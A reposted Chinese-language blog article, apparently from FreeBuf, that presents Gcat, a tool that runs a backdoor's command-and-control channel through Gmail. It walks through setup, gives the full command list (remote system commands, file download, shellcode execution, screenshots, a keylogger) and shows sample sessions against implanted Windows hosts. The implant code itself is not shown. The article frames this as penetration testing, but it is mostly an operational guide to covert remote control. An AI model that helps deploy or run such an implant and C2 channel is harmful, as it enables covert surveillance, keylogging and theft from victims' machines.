转载

巧用Gmail做你的C&C服务器

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

巧用Gmail做你的C&C服务器

在渗透测试中,C&C(命令与控制)服务器一直是个关键的问题……Gmail或许是一个不错的选择?那么这款名为Gcat的工具就得出动了。

操作步骤

为了做这个工作,你需要做好下面准备

一个Gmail账号(别用你的个人账号哦……你懂的)

在安全设置中,开启"Allow less secure apps"

repo包含两个文件:

gcat.py 用于命令执行 implant.py 用于后门部署

在上述两个文件中,编辑gmail_user and gmail_pwd为你自己的

使用

Gcat工具 

optional arguments:   -h, --help            show this help message and exit   -v, --version         show program's version number and exit   -id ID                Client to target   -jobid JOBID          Job id to retrieve   -list                 List available clients   -info                 Retrieve info on specified client

命令 

Commands to execute on an implant  -cmd CMD              Execute a system command  -download PATH        Download a file from a clients system  -exec-shellcode FILE  Execute supplied shellcode on a client  -screenshot           Take a screenshot  -lock-screen          Lock the clients screen  -force-checkin        Force a check in  -start-keylogger      Start keylogger  -stop-keylogger       Stop keylogger

部署后门后,用以下命令测试一下:

#~ python gcat.py -list f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86 90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

输出的是UUID,用于标识每个操作系统

操作实例

#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all' [*] Command sent successfully with jobid: SH3C4gv Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs the jobid that we can use to retrieve the output of that command Lets get the results! #~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv      DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)' JOBID: SH3C4gv FG WINDOW: 'Command Prompt - C:/Python27/python.exe implant.py' CMD: 'ipconfig /all' Windows IP Configuration  Host Name . . . . . . . . . . . . : unknown-2d44b52  Primary Dns Suffix  . . . . . . . :   Node Type . . . . . . . . . . . . : Unknown  IP Routing Enabled. . . . . . . . : No  WINS Proxy Enabled. . . . . . . . : No -- SNIP --

Gcat下载

下载地址

*本文作者:fu4k ,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)

正文到此结束
所属分类: 编程技术

热门推荐

相关文章

阿里云首购8折
说给你听

本文目录
随机标签
书籍教程
springboot-demo Java入门教程 bootstrap3 CSS Apache基础教程 php ionic 教程 Python mysql教程 eclipse Ubuntu VPS系统配置 AngularJS 教程 MongoDB教程 Struts2教程 Redis教程 Spring教程 Git教程 Jenkins进阶系列 openfire参考指南 Java设计模式 HBase教程 Maven教程 hibernate教程 Docker 教程 memcached教程 Quartz指南 springcloud-demo Hive教程 Ant教程 ANTLR教程 SpringCloud java实例教程 XStream教程 Hazelcast教程 Elastic-Job-Lite 深入浅出MyBatis SVN教程 ibaties教程 rabittmq教程 solr教程 Hadoop教程 WebService CXF学习 JPA教程 ActiveMQ中文指南 java-demo Java内存模型 dubbo教程 python3-demo Linux入门视频教程
近期评论
  1. 1 如何将Spring Cloud Task发布Data Flow上执行?
  2. 2 Spring Cloud Data Flow快速入门Demo
  3. 3 Spring Cloud Consul实现选举机制
  4. 4 Spring Boot集成ShedLock实现分布式定时任务
  5. 5 利用oss进行数据库和网站图片备份
  6. 6 Spring Cloud Stream实现数据流处理
  7. 7 Python3访问MySQL数据库快速入门Demo
  8. 8 Github开源项目作者可以免费申请 JetBrains 全家桶
  9. 9 Spring Cloud Vault快速入门Demo
  10. 10 Spring Cloud Gateway快速入门Demo
网站信息
  • 文章总数:82,716 篇
  • 文件总数:284,297 个
  • 标签总数:2,396 个
  • 分类总数:85 个
  • 留言数量:2,560 条
  • 在线人数:631 人
  • 运行天数:4,411天
  • 最后更新:2024年11月24日11点
Loading...

其他链接

关于本站

本站定位:个人技术类博客

本站作用:写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

[HBLOG]公众号 HBLOG HBLOG